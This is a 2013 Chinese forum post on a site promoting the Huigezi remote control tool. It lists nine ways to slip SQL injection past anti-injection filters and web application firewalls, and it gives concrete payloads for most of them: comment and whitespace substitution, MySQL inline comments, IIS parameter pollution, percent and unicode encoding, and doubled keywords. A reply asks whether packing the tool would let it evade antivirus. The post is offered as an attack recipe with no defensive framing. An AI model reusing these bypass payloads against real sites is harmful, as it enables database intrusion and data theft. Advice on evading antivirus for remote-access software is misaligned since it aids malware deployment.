灰鸽子远程控制软件

 找回密码
 立即注册

QQ登录

只需一步,快速开始

查看: 10881|回复: 1

绕过防注入系统 包括WAF的测试等多个方案 灰鸽子下载www.huigezi.org

[复制链接]
发表于 2013-2-3 13:59:39 | 显示全部楼层 |阅读模式
绕过防注入系统 包括WAF的测试等多个方案 灰鸽子下载
方案一、  把测试代码的空格替换成  /**/  或者+     (注:/**/ 和+ 不要进行url编码)
?
如果要保持原样复制代码,需要双击后,选择代码右键复制即可
01
02
03 如: id=1 or 1=1
    id=1/**/or/**/1=1
    id=1+or+1=1
方案二、把空格替换成非可见字符    %09 %0A %0D %0B
?
如果要保持原样复制代码,需要双击后,选择代码右键复制即可
01
02
03
04 如: id=1 or 1=1
    id=1%09or%091=1
    id=1%0Aor%0A1=1
    id=1%0A%0Bor%0A%0B1=1
方案三、把关键字用 /*!*/包起来,注,这个方法只适用于mysql数据库的站点
?
如果要保持原样复制代码,需要双击后,选择代码右键复制即可
01
02 如: id=1 and 1=1
    id=1 /*!and*/1=1
方案四、使用参数污染法攻击绕过,注,该方法只适用于webserver是微软的IIS的情况下
?
如果要保持原样复制代码,需要双击后,选择代码右键复制即可
01
02 如: id=1 union select 1 from admin
    id=1 union/*&id=*/select/*&id=*/from/*&id=*/admin
方案五、使用%绕过,注,该方法只适用于asp/aspx
?
如果要保持原样复制代码,需要双击后,选择代码右键复制即可
01
02 如: id=1 union select 1 from admin
    id=1 un%io%n sel%e%ct 1 fr%o%m ad%m%in
方案六、使用%23 (明文为#号)和%0A配合使用绕过,注,这个方法只适用于mysql数据库的站点
?
如果要保持原样复制代码,需要双击后,选择代码右键复制即可
01
02 如: id=1 union select 1 from admin
    id=1%23afafasdf%0Aunion%23afafasdf%0Aselect%23afafasdf%0A1%23afafasdf%0Afrom%23afafasdf%0Aadmin
方案七、使用重复关键字绕过
?
如果要保持原样复制代码,需要双击后,选择代码右键复制即可
01
02 如: id=1 union select 1 from admin
    id=1 ununionion seleselectct 1 frofromm admin
方案八、使用unicode编码绕过
?
如果要保持原样复制代码,需要双击后,选择代码右键复制即可
01
02 如: id=1 union select 1 from admin
    id=1 %u0075%u006e%u0069%u006f%u006e select 1 %u0066%u0072%u006f%u006d admin
方案九、使用畸形包绕过,只适用于 asp/aspx,详情可以看80sec的站点
评帖赚银币(0) 收起
回复

使用道具 举报

发表于 2013-2-3 22:34:44 | 显示全部楼层
如果把輝鴿子包裝起來可以過防毒嗎?
评帖赚银币(0) 收起
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|灰鸽子远程控制软件|灰鸽子远程控制软件 ( 鲁ICP备14000061号-4 )

GMT+8, 2024-11-1 12:33 , Processed in 0.061579 second(s), 22 queries , Gzip On.

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表